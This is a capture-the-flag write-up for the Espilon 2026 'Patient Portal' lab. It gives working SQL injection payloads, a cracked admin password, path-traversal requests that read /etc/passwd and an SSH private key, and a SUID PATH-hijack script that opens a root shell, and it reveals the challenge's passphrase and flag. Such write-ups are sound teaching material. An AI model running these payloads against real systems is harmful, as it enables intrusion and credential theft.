ESPILON-CTF-2026-Writeups/Misc/Patient_Portal/README.md

# Patient Portal

| Field | Value |
|-------|-------|
| Category | Misc |
| Difficulty | Medium-Hard |
| Points | 500 |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff.
Intelligence suggests the system was hastily deployed by contractor M. Eiri.

Gain full control of the machine.

**Ports:**
- 8080: Web Portal (HTTP)
- 2222: SSH

Format: **ESPILON{flag}**

---

## TL;DR

SQL injection on the `/search` endpoint to dump credentials and the SSH passphrase. Log in
as admin, exploit path traversal on the report download endpoint to steal the SSH private key.
SSH in as `webadmin`. Find a SUID binary that calls `logger` with a relative path. Hijack it
via PATH injection to spawn a root shell and read the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| Browser / `curl` | SQL injection, admin login, path traversal |
| `hashcat` / CrackStation | MD5 crack for admin password |
| `ssh` | Login as webadmin |
| `bash` | PATH injection privilege escalation |

---

## Solution

### Stage 1 — SQL Injection

The `/search?q=` endpoint is vulnerable to UNION-based injection with 6 columns.

**Enumerate columns:**

```
/search?q=' UNION SELECT 1,2,3,4,5,6--
```

**Discover tables:**

```
/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--
```

Tables: `patients`, `users`, `system_config`

**Dump users:**

```
/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--
```

Results:
- `admin` : MD5 hash `e0b7e413c064de43c6c1ca40a8c175a1`
- `nurse01` : (irrelevant)

**Dump system_config:**

```
/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--
```

Key finding: `ssh_passphrase = wired-med-013`

![SQLi response showing the admin hash and ssh_passphrase rows](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_sqli.png)

**Crack the admin password:**

```bash
echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1
```

Password: `SainteMika2026`

---

### Stage 2 — Admin Access

Log in at `/login`:

- Username: `admin`
- Password: `SainteMika2026`

The admin panel reveals: SSH port 2222, user `webadmin`.

![admin panel after login showing report links and system info](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_admin.png)

---

### Stage 3 — Path Traversal

The `/admin/reports?file=` endpoint is vulnerable to path traversal.

**Confirm user exists:**

```
/admin/reports?file=../../../etc/passwd
```

**Extract the SSH private key:**

```
/admin/reports?file=../../../home/webadmin/.ssh/id_rsa
```

Save the key to `id_rsa` locally.

![path traversal response returning the id_rsa private key](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_lfi.png)

---

### Stage 4 — SSH Access

```bash
chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<HOST>
# Passphrase: wired-med-013  (from system_config)
```

---

### Stage 5 — Privilege Escalation

**Find SUID binaries:**

```bash
find / -perm -4000 -type f 2>/dev/null
```

Found: `/opt/navi-monitor/vital-check` (SUID root)

**Inspect the binary:**

```bash
strings /opt/navi-monitor/vital-check | grep logger
```

The binary calls `system("logger -t vital-check 'check complete'")` using a
**relative path** for `logger`.

![strings output confirming the relative logger call](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_strings.png)

**Exploit via PATH hijacking:**

```bash
echo '#!/bin/bash' > /tmp/logger
echo '/bin/bash -p' >> /tmp/logger
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check
```

`bash -p` preserves the SUID effective UID, spawning a root shell.

**Read the flag:**

```bash
cat /root/root.txt
```

![root shell reading /root/root.txt with the flag](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/patient_root.png)

---

## Flag

`ESPILON{r00t_0f_s41nt3_m1k4}`